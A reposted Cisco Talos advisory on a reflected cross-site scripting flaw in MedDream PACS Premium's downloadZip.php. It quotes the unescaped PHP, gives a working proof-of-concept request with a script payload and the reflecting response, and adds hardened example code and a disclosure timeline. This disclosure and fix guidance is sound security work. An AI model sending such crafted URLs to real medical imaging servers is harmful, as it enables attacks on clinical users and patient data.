MedDream PACS Premium downloadZip reflected cross-site scripting (XSS) vulnerability
2026-01-20 00:00:33 Author: talosintelligence.com (view original)

SUMMARY

A reflected cross-site scripting (XSS) vulnerability exists in the downloadZip functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary JavaScript code execution. An attacker can provide a crafted URL to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

MedDream PACS Premium 7.3.6.870

PRODUCT URLS

MedDream PACS Premium - https://meddream.com/products/meddream-pacs-server/

CVSSv3 SCORE

6.1 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)

DETAILS

MedDream PACS is a DICOM 3.0-compliant server for storing, managing, and retrieving medical images. It includes a web-based DICOM viewer and administration interface, with features like user access control, study forwarding, and multi-format image support.

A pre-authentication reflected cross-site scripting vulnerability exists in the functionality of the Pacs/downloadZip.php script. The value of the seq parameter used in that script is written into the HTML output without any sanitization. The vulnerable code appears as follows:

$seq = $_GET['seq']; // [1] value taken straight from the query string
if (!isset($_SESSION["downloadFilename-$seq"]) || !isset($_SESSION["downloadPath-$seq"]))
    die("Download sequence [$seq] not found!"); // [2] $seq written into the HTML response unescaped

The $seq variable is taken directly from the request and is fully attacker-controlled [1]. If the session holds no file name entry for that $seq value, an error message containing the unescaped value is written into the HTML response [2]. Example of a malicious request and the response containing the injected HTML/JavaScript code:

GET /Pacs/downloadZip.php?seq=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
Host: 192.168.0.42
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: sessionCookie=%DC%07%E5Rlp%1B%AA%B8%E6%BE%F3n%FA%E9%97%C70%84%EE%D2%91x%8E%40F%12u%8D%E7%EC%5C; PHPSESSID=d92c6a70310515c9c11b928a9fb86bee; MEDDREAMSESSID=89F9D14757A096B63E147238A622FC72
Upgrade-Insecure-Requests: 1
Priority: u=0, i

RESP

HTTP/1.1 200 OK
Date: Tue, 19 Aug 2025 15:49:14 GMT
Server: =^_^=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Powered-By: PHP/8.3.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=(), camera=()
Content-Length: 56
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Download sequence [<script>alert(1)</script>] not found!
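
A hardened version of the same lookup, added here as an example and not MedDream's own or patched code; it assumes the session key layout shown above ("downloadFilename-<seq>" / "downloadPath-<seq>"), and the helper names is_valid_seq, h and lookup_download are ours.

```php
<?php
// Added example, not MedDream's code: a hardened downloadZip.php lookup.
// Assumes the same $_SESSION key layout as the snippet in the advisory.
declare(strict_types=1);

// Allow-list the sequence token. It is only ever used to build session keys,
// so anything beyond a short run of letters and digits is rejected outright.
function is_valid_seq(string $seq): bool
{
    return preg_match('/\A[A-Za-z0-9]{1,64}\z/', $seq) === 1;
}

// Context-aware output encoding for text placed in an HTML body.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Returns [HTTP status, body]; the raw request value is never reflected.
function lookup_download(array $get, array $session): array
{
    $seq = (string) ($get['seq'] ?? '');

    if (!is_valid_seq($seq)) {
        return [400, 'Invalid download sequence.'];
    }
    if (!isset($session["downloadFilename-$seq"], $session["downloadPath-$seq"])) {
        // Even a token that passed validation is encoded before it reaches the page.
        return [404, 'Download sequence [' . h($seq) . '] not found!'];
    }
    return [200, $session["downloadPath-$seq"]];
}

// Constructed demonstration input: the payload from the advisory request above.
[$status, $body] = lookup_download(['seq' => '<script>alert(1)</script>'], []);
// $status is 400 and $body contains no attacker-supplied markup.
http_response_code($status);
header('Content-Type: text/html; charset=UTF-8');
header("Content-Security-Policy: default-src 'self'");
echo $body;
```

The response above already carries X-XSS-Protection: 1; mode=block, which current browsers ignore, so input validation, output encoding and a Content-Security-Policy are the controls that actually matter here.
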

TIMELINE

2025-09-02 - Vendor Disclosure
2025-12-05 - Vendor Patch Release
2026-01-20 - Public Release

Discovered by Marcin 'Icewall' Noga of Cisco Talos.


Source: https://talosintelligence.com/vulnerability_reports/TALOS-2025-2254